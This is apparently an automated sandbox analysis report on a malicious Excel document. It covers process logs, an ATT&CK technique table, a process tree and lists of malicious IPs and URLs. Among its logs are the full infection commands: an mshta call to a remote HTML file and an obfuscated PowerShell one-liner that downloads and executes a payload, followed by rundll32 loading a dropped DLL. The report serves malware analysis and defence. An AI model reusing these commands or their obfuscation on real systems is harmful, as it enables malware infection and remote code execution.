                            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
                            Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD509.tmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_00343C3B CreateToolhelp32Snapshot
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: 36E8.tmp.0.dr Initial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer
                            Source: Milossd.dll.8.dr Static PE information: real checksum: 0x8f55d should be: 0x8973e
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\Milossd.dll
                            Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy)

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100134F0 IsIconic
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 2552 Thread sleep time: -360000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_11-32031
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: rundll32.exe, 0000000C.00000002.509950436.00000000002AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: rundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,11_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,13_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0035BAEA FindFirstFileW,17_2_0035BAEA
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,11_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CD374 mov eax, dword ptr fs:[00000030h]11_2_002CD374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082C774 mov eax, dword ptr fs:[00000030h]12_2_0082C774
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074D374 mov eax, dword ptr fs:[00000030h]12_2_0074D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061D374 mov eax, dword ptr fs:[00000030h]13_2_0061D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AD374 mov eax, dword ptr fs:[00000030h]14_2_002AD374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028D374 mov eax, dword ptr fs:[00000030h]16_2_0028D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0035D374 mov eax, dword ptr fs:[00000030h]17_2_0035D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,11_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,13_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,13_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 74.207.230.120 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 139.196.72.155 144
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
Source: Yara match File source: DOCUMENT_2801.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\DOCUMENT_2801.xls, type: DROPPED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,13_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,13_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,13_2_10014B71
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003DAA7 cpuid 11_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,11_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,11_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,11_2_100453C8

Stealing of Sensitive Information
                            Source: Yara matchFile source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match. File source: C:\ProgramData\Milossd.dll, type: DROPPED
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 21 Scripting | 1 Windows Service | 1 Windows Service | 2 Disable or Modify Tools | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 13 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | 13 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 21 Scripting | Security Account Manager | 38 System Information Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | 11 Command and Scripting Interpreter | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 21 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | 1 Service Execution | Network Logon Script | Network Logon Script | 2 Masquerading | LSA Secrets | 1 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | 122 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | 1 PowerShell | Rc.common | Rc.common | 1 Virtualization/Sandbox Evasion | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 111 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Hidden Files and Directories | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Rundll32 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
Behavior Graph ID: 562416, Sample: DOCUMENT_2801.xls, Startdate: 28/01/2022, Architecture: WINDOWS, Score: 100

Signatures on the sample:
• Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
• Multi AV Scanner detection for domain / URL
• Found malware configuration
• 17 other signatures

DNS/IP info on the sample:
• 210.57.209.142, UNAIR-AS-IDUniversitasAirlanggaID, Indonesia
• 118.98.72.86, TELKOMNET-AS-APPTTelekomunikasiIndonesiaID, Indonesia
• 29 other IPs or domains

Process tree:
EXCEL.EXE (started)
  dropped: C:\Users\user\Desktop\DOCUMENT_2801.xls, Composite
  signature: Passes commands via pipe to a shell (likely to bypass AV or HIPS)
  cmd.exe (started)
    cmd.exe (started)
      mshta.exe (started)
        DNS/IP: 91.240.118.172, 49165, 49166, 80, GLOBALLAYERNL, unknown
        powershell.exe (started)
          DNS/IP: tamiladsense.com, 136.0.111.15, 49167, 80, AS40676US, United States
          dropped: C:\ProgramData\Milossd.dll, PE32
          signature: Powershell drops PE file
          cmd.exe (started)
            rundll32.exe (started)
              rundll32.exe (started)
                dropped: C:\Windows\...\kisyfwhhvxv.tpx (copy), PE32
                signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                rundll32.exe (started)
                  rundll32.exe (started)
                    signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
    cmd.exe (started)

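| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| DOCUMENT_2801.xls | 17% | ReversingLabs | Document-Excel.Trojan.Heuristic | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\ProgramData\Milossd.dll | 100% | Joe Sandbox ML | | |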
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| tamiladsense.com | 8% | Virustotal | | Browse |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| tamiladsense.com | 136.0.111.15 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://91.240.118.172/ee/ss/se.html | true | Avira URL Cloud: malware | unknown |
| http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/ | true | Avira URL Cloud: malware | unknown |
| http://91.240.118.172/ee/ss/se.png | true | Avira URL Cloud: malware | unknown |
                            • Avira URL Cloud: malware
                            unknown
                            http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://139.196.72.155/Rrundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://91.240.118.172/ee/ss/se.ppowershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tamiladsense.com/wp-inclupowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
